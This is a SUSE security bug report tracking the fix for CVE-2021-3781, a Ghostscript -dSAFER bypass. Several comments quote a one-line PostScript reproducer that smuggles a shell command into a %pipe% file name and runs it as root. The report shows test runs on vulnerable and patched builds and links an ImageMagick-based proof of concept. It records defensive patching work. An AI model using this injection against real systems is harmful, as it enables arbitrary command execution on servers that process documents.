Bug 1190381 - (CVE-2021-3781) VUL-0: CVE-2021-3781: ghostscript: RCE injection
(CVE-2021-3781)
VUL-0: CVE-2021-3781: ghostscript: RCE injection
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P1 - Urgent : Major
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/309793/
CVSSv3.1:SUSE:CVE-2021-3781:9.8:(AV:N...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2021-09-10 08:48 UTC by Marcus Meissner
Modified: 2022-06-20 14:15 UTC (History)
2 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Marcus Meissner 2021-09-10 08:48:02 UTC
https://bugs.ghostscript.com/show_bug.cgi?id=704342                                                                                                                                          

Here's a trivial -dSAFER bypass that allows to execute arbitrary shell commands                                                                                                              
in the 9.55 Git version:                                                                                                                                                                     
                                                                                                                                                                                             
# bin/gs -dSAFER                                                                                                                                                                             
GPL Ghostscript GIT PRERELEASE 9.55.0 (2021-03-30) [...]                                                                                                                                     
GS>(%pipe%/tmp/&id)(w)file                                                                                                                                                                   
GS<1>sh: 1: /tmp/: Permission denied                                                                                                                                                         
uid=0(root) gid=0(root) groups=0(root)                                                                                                                                                       
                                                                                                                                                                                             
Greetings                                                                                                                                                                                    
Jens
Comment 1 Johannes Meixner 2021-09-10 08:54:11 UTC
CVE-2021-3781 has been assigned to this flaw
see
https://bugs.ghostscript.com/show_bug.cgi?id=704342#c12
Comment 2 Johannes Meixner 2021-09-10 09:03:17 UTC
For SLE15:

A fixed Ghostscript is in IBS
home:jsmeix:branches:SUSE:SLE-15:Update/ghostscript.SUSE_SLE-15_Update

On my SLES15-SP3 test system (KVM virtual machine)
without the fix
--------------------------------------------------------------------------
# gs -dSAFER -sDEVICE=nullpage
GPL Ghostscript 9.52 (2020-03-19)
Copyright (C) 2020 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY:
see the file COPYING for details.
GS>(%pipe%/tmp/&id)(w)file
GS<1>uid=0(root) gid=0(root) groups=0(root)
sh: /tmp/: Is a directory
quit
--------------------------------------------------------------------------
versus with the fix (long lines shown wrapped here)
--------------------------------------------------------------------------
# gs -dSAFER -sDEVICE=nullpage
GPL Ghostscript 9.52 (2020-03-19)
Copyright (C) 2020 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY:
see the file COPYING for details.
GS>(%pipe%/tmp/&id)(w)file
Error: /invalidfileaccess in --file--
Operand stack:
   (%pipe%/tmp/&id)   (w)
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--
   --nostringval--   2   %stopped_push   --nostringval--
   --nostringval--   %loop_continue   --nostringval--
   --nostringval--   false   1   %stopped_push   .runexec2
   --nostringval--   --nostringval--   --nostringval--   2
   %stopped_push   --nostringval--
Dictionary stack:
   --dict:732/1123(ro)(G)--   --dict:0/20(G)--   --dict:75/200(L)--
Current allocation mode is local
Last OS error: Permission denied
Current file position is 24
GS<2>quit
--------------------------------------------------------------------------
Comment 3 Gabriele Sonnu 2021-09-10 09:07:53 UTC
There is also a poc on GitHub that uses ImageMagick to trigger the vulnerability [0].

I tried to reproduce it on my SLE-12 (SP3, SP4, SP5), SLE-15 (GA, SP1, SP2, SP3) and OpenSUSE test system (containers) with no luck.

[0]
https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50
Comment 4 Johannes Meixner 2021-09-10 09:20:12 UTC
Submitted for SLE15:
-------------------------------------------------------------
# osc -A https://api.suse.de mr -m \
 'Ghostscript security fix CVE-2021-3781 (bsc#1190381)' \
 home:jsmeix:branches:SUSE:SLE-15:Update \
 ghostscript.SUSE_SLE-15_Update \
 SUSE:SLE-15:Update
Using target project 'SUSE:Maintenance'.
(release in 'SUSE:SLE-15:Update')
249584
-------------------------------------------------------------
Comment 5 Johannes Meixner 2021-09-10 10:21:46 UTC
For SLE12:

I think I have a fixed Ghostscript in IBS
home:jsmeix:branches:SUSE:SLE-12:Update/ghostscript.SUSE_SLE-12_Update

But I cannot test it on my SLES12 SP5 test system
(KVM virtual machine) because somehow it seems
it does not start to build because since some time

# osc -A https://api.suse.de results -v \
 home:jsmeix:branches:SUSE:SLE-12:Update \
 ghostscript.SUSE_SLE-12_Update

only shows "outdated"
but it doesn't go into "building" state
so I sit and wait...
Comment 7 Johannes Meixner 2021-09-10 11:41:12 UTC
With current Ghostscript 9.54
from the OBS Printing project
on my openSUSE Leap 15.2 laptop
(long lines shown wrapped here):
--------------------------------------------------------------
# gs -dSAFER -sDEVICE=nullpage
GPL Ghostscript 9.54.0 (2021-03-30)
Copyright (C) 2021 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3
and comes with NO WARRANTY:
see the file COPYING for details.
GS>(%pipe%/tmp/&id)(w)file
Error: /ioerror in --file--
Operand stack:
   (%pipe%/tmp/&id)   (w)
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--
   --nostringval--   2   %stopped_push   --nostringval--
   --nostringval--   %loop_continue   --nostringval--
   --nostringval--   false   1   %stopped_push   .runexec2
   --nostringval--   --nostringval--   --nostringval--   2
   %stopped_push   --nostringval--
Dictionary stack:
   --dict:726/1123(ro)(G)--   --dict:0/20(G)--   --dict:75/200(L)--
Current allocation mode is local
Last OS error: Cannot allocate memory
Current file position is 24
GS<2>quit
--------------------------------------------------------------
so current Ghostscript 9.54 from OBS Printing project
is not vulnerable with the exact reproducer
because the reproducer fails
with "Error: /ioerror in --file--".

Versus a fixed version with CVE-2021-3781.patch as is from
https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=a9bd3dec9fde
(long lines shown wrapped here):
--------------------------------------------------------------
# gs -dSAFER -sDEVICE=nullpage
GPL Ghostscript 9.54.0 (2021-03-30)
Copyright (C) 2021 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3
and comes with NO WARRANTY:
see the file COPYING for details.
GS>(%pipe%/tmp/&id)(w)file
Error: /invalidfileaccess in --file--
Operand stack:
   (%pipe%/tmp/&id)   (w)
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--
   --nostringval--   2   %stopped_push   --nostringval--
   --nostringval--   %loop_continue   --nostringval--
   --nostringval--   false   1   %stopped_push   .runexec2
   --nostringval--   --nostringval--   --nostringval--   2
   %stopped_push   --nostringval--
Dictionary stack:
   --dict:726/1123(ro)(G)--   --dict:0/20(G)--   --dict:75/200(L)--
Current allocation mode is local
Last OS error: Permission denied
Current file position is 24
GS<2>quit
--------------------------------------------------------------
which looks better because now the reproducer gets rejected
with "Error: /invalidfileaccess in --file--".

Therefore I submitted that fixed version
to the OBS Printing project
and forwarded it to openSUSE:Factory
--------------------------------------------------------------
# osc submitrequest -m \
 'Ghostscript security fix CVE-2021-3781 (bsc#1190381)' \ 
 home:jsmeix:branches:Printing ghostscript Printing ghostscript
created request id 917941

# osc request accept -m \
 'Ghostscript security fix CVE-2021-3781 (bsc#1190381)' 917941
Result of change request state: ok
openSUSE:Factory 
Forward this submit to it? ([y]/n)y
The following submit request is already open: 880734.
Supersede the old request? (y/n/c) n
Ghostscript security fix CVE-2021-3781 (bsc#1190381)
(forwarded request 917941 from jsmeix)
New request # 917942
--------------------------------------------------------------
Comment 8 OBSbugzilla Bot 2021-09-10 12:40:06 UTC
This is an autogenerated message for OBS integration:
This bug (1190381) was mentioned in
https://build.opensuse.org/request/show/917942 Factory / ghostscript
Comment 9 Johannes Meixner 2021-09-10 12:53:10 UTC
Continuing "For SLE12" (cf. comment#5):

It seems IBS build status is currently shown "unexpected"
because all except x86_64 switched from "outdated"
to "succeeded" without noticeable "building" in between
but I need x86_64 to be able to test it.

I have no idea how long it may take until also
x86_64 switched from "outdated" to "succeeded".

Because I cannot test it I submit it now "bona fide"
without having it tested myself before on SLE12:
-------------------------------------------------------------
# isc mr -m \
 'Ghostscript security fix CVE-2021-3781 (bsc#1190381)' \
 home:jsmeix:branches:SUSE:SLE-12:Update \
 ghostscript.SUSE_SLE-12_Update \
 SUSE:SLE-12:Update
Using target project 'SUSE:Maintenance'.
(release in 'SUSE:SLE-12:Update')
249602
-------------------------------------------------------------
Comment 10 Johannes Meixner 2021-09-10 12:57:40 UTC
I subimtted it for all affected code streams
so I re-assign it to security-team for further processing.
Comment 12 Johannes Meixner 2021-09-13 12:55:38 UTC
Test for SLE12:

On my SLES12-SP5 test system (KVM virtual machine)
without the fix (long lines shown wrapped here)
----------------------------------------------------------------
# gs -dSAFER -sDEVICE=nullpage
GPL Ghostscript 9.52 (2020-03-19)
Copyright (C) 2020 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3
 and comes with NO WARRANTY:
see the file COPYING for details.
GS>(%pipe%/tmp/&id)(w)file
GS<1>uid=0(root) gid=0(root) groups=0(root)
sh: /tmp/: Is a directory
quit
----------------------------------------------------------------
versus with the fix (long lines shown wrapped here)
----------------------------------------------------------------
# gs -dSAFER -sDEVICE=nullpage
GPL Ghostscript 9.52 (2020-03-19)
Copyright (C) 2020 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3
 and comes with NO WARRANTY:
see the file COPYING for details.
GS>(%pipe%/tmp/&id)(w)file
Error: /invalidfileaccess in --file--
Operand stack:
   (%pipe%/tmp/&id)   (w)
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--
   --nostringval--   2   %stopped_push   --nostringval--
   --nostringval--   %loop_continue   --nostringval--
   --nostringval--   false   1   %stopped_push   .runexec2
   --nostringval--   --nostringval--   --nostringval--   2
   %stopped_push   --nostringval--
Dictionary stack:
   --dict:732/1123(ro)(G)--   --dict:0/20(G)--   --dict:75/200(L)--
Current allocation mode is local
Last OS error: Permission denied
Current file position is 24
GS<2>quit
----------------------------------------------------------------
i.e. same as the test for SLE15 in comment #2
(as expected because both use same Ghostscript sources).
Comment 13 Swamp Workflow Management 2021-09-15 13:17:50 UTC
# maintenance_jira_update_notice
openSUSE-SU-2021:3044-1: An update that solves one vulnerability and has one errata is now available.

Category: security (critical)
Bug References: 1184123,1190381
CVE References: CVE-2021-3781
JIRA References: 
Sources used:
openSUSE Leap 15.3 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
Comment 14 Swamp Workflow Management 2021-09-15 13:22:31 UTC
# maintenance_jira_update_notice
SUSE-SU-2021:3044-1: An update that solves one vulnerability and has one errata is now available.

Category: security (critical)
Bug References: 1184123,1190381
CVE References: CVE-2021-3781
JIRA References: 
Sources used:
SUSE Manager Server 4.0 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Manager Retail Branch Server 4.0 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Manager Proxy 4.0 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Server for SAP 15-SP1 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Server for SAP 15 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Server 15-SP1-LTSS (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Server 15-SP1-BCL (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Server 15-LTSS (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Module for Desktop Applications 15-SP3 (src):    libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Module for Desktop Applications 15-SP2 (src):    libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    ghostscript-9.52-155.1
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src):    ghostscript-9.52-155.1
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Enterprise Storage 6 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE CaaS Platform 4.0 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 15 Swamp Workflow Management 2021-09-16 13:22:27 UTC
# maintenance_jira_update_notice
openSUSE-SU-2021:1273-1: An update that solves one vulnerability and has one errata is now available.

Category: security (critical)
Bug References: 1184123,1190381
CVE References: CVE-2021-3781
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    ghostscript-9.52-lp152.2.7.1, ghostscript-mini-9.52-lp152.2.7.1, libspectre-0.2.8-lp152.4.3.1
Comment 16 Swamp Workflow Management 2021-09-21 20:45:12 UTC
# maintenance_jira_update_notice
SUSE-SU-2021:3180-1: An update that fixes one vulnerability is now available.

Category: security (critical)
Bug References: 1190381
CVE References: CVE-2021-3781
JIRA References: 
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE OpenStack Cloud Crowbar 8 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE OpenStack Cloud 9 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE OpenStack Cloud 8 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Server 12-SP5 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
HPE Helion Openstack 8 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 17 Johannes Meixner 2021-10-18 06:43:32 UTC
Only for the log
how it is on my SLES11-SP4 test system (KVM virtual machine)
with ghostscript-library-8.62 as is from SLES11-SP4
(long lines shown wrapped here)
-------------------------------------------------------------
# gs -dSAFER -sDEVICE=nullpage
GPL Ghostscript 8.62 (2008-02-29)
Copyright (C) 2008 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY:
 see the file COPYING for details.
GS>(%pipe%/tmp/&id)(w)file
Error: /invalidfileaccess in --execute--
Operand stack:
   (%pipe%/tmp/&id)   (w)
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--
   --nostringval--   2   %stopped_push   --nostringval--
   --nostringval--   %loop_continue   1801   2   3   %oparray_pop
   --nostringval--   --nostringval--   false   1   %stopped_push
   .runexec2   --nostringval--   --nostringval--   --nostringval--
   2   %stopped_push   --nostringval--
Dictionary stack:
   --dict:1164/3371(ro)(G)--   --dict:0/20(G)--   --dict:70/200(L)--
Current allocation mode is local
Last OS error: 2
Current file position is 24
GS<2>quit
-------------------------------------------------------------
Comment 18 Marcus Meissner 2022-06-20 14:15:27 UTC
For SLE11 %pipe% is already protected by -dSAFER.

I mark it as "already fixed" for those.